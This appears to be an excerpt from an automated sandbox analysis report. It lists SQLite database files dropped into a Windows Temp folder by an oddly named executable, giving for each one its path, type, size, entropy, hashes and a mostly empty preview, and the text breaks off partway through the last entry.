                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\7GSPd8ANvq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\7IH04MgjX7

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\7Iphs7ceiY

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\7klCjpjjDU

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\82D9QWMLtq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\84QobOKDJ5

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\85ZHdKorx4

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\8pssMFZrs3

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\8rIkMTlTtb

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):5242880
                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\9CnCfCmMz3

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\9aw09WPynQ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\9jkB70QTTw

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\9q9jq29Lj7

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\A5jb59ND1Y

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\A6FQMCTPKN

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ADgdTLF2Fo

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ANLyy6ozAP

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\AVN1HijcRK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\B2R4aLoiRp

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\BXyWzbqDLX

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\BazzemGr9e

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\BduYB0WKi5

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\BgTC6k3EBb

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
